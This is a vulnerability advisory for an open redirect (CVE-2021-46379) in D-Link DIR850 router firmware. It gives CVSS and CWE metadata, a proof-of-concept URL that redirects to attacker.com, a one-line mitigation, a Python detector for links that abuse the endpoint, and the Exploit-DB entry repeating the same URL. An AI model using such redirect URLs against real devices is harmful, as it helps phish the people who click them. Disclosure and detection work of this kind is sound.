vendor: DIR850
by: AhmedAlroky
CVSS: 6.1 MEDIUM
Open Redirect
CWE: 601
Product Name: DIR850
Affected Version From: ET850-1.08TRb03
Affected Version To: ET850-1.08TRb03
Patch Exists: YES
Related CVE: CVE-2021-46379
CPE: h:dlink:dir850
Metasploit:
Other Scripts:
Tags: cve,cve2021,redirect,dlink,router
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Nuclei Metadata: {'max-request': 1, 'verified': True, 'vendor': 'dlink', 'product': 'dir-850l_firmware'}
Platforms Tested:
2022

DLINK DIR850 – Open Redirect

Visiting the URL http://<IP Address>/boafrm/formWlanRedirect?redirect-url=http://attacker.com&wlan_id=1 allows an attacker to redirect users to a malicious website.

Mitigation:

Ensure that the application does not accept user-supplied input for the target of a redirection.
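
One way to apply this check, and to flag links that abuse the endpoint, shown as an added example (it is not code from the advisory or from the D-Link firmware). The function names and the sample address 192.0.2.1 are assumptions; the path and parameter name are the ones given above.

```python
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/boafrm/formWlanRedirect"  # path named in the advisory
PARAM = "redirect-url"                 # parameter named in the advisory

def is_local_target(target, device_host):
    """True only for a same-device target: a single-slash absolute path, or
    an http(s) URL whose host is device_host and that carries no userinfo."""
    # Backslashes and control characters are normalised differently by
    # browsers and by parsers, so reject them outright.
    if not target or any(c == "\\" or ord(c) < 0x20 for c in target):
        return False
    try:
        parts = urlsplit(target)
    except ValueError:  # e.g. malformed IPv6 literal
        return False
    if not parts.scheme and not parts.netloc:
        # "///host" parses with an empty netloc but browsers still leave the site
        return target.startswith("/") and not target.startswith("//")
    if parts.scheme not in ("http", "https"):
        return False  # javascript:, data:, and scheme-relative "//host"
    return parts.username is None and parts.hostname == device_host.lower()

def flag_redirect_links(urls):
    """Return (url, target) for each formWlanRedirect link whose target
    leaves the host the link itself points at."""
    hits = []
    for url in urls:
        parts = urlsplit(url)
        if parts.path != ENDPOINT:
            continue
        query = parse_qs(parts.query, keep_blank_values=True)
        for target in query.get(PARAM, []):
            if not is_local_target(target, parts.hostname or ""):
                hits.append((url, target))
    return hits

# Constructed sample links (192.0.2.1 is a documentation address).
SAMPLE_URLS = [
    "http://192.0.2.1/boafrm/formWlanRedirect?redirect-url=http://attacker.com&wlan_id=1",
    "http://192.0.2.1/boafrm/formWlanRedirect?redirect-url=%2F%2Fattacker.example&wlan_id=1",
    "http://192.0.2.1/boafrm/formWlanRedirect?redirect-url=/index.html&wlan_id=1",
    "http://192.0.2.1/index.html",
]

if __name__ == "__main__":
    for url, target in flag_redirect_links(SAMPLE_URLS):
        print(f"off-device redirect target {target!r} in {url}")
```

The same predicate can sit in front of the redirect itself on the server side, or run over proxy and mail-gateway logs to find links that were already circulated.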

Exploit-DB raw data:

# Exploit Title: DLINK DIR850 - Open Redirect
# Product: Dlink
# Model: DIR850
# Date: 14/1/2022
# CVE: CVE-2021-46379
# Exploit Author: AhmedAlroky
# Hardware version: b1
# Firmware version: ET850-1.08TRb03
# Vendor home page: https://www.dlink.com/

#Exploit : 
Visit http://<IP Address>/boafrm/formWlanRedirect?redirect-url=http://attacker.com&wlan_id=1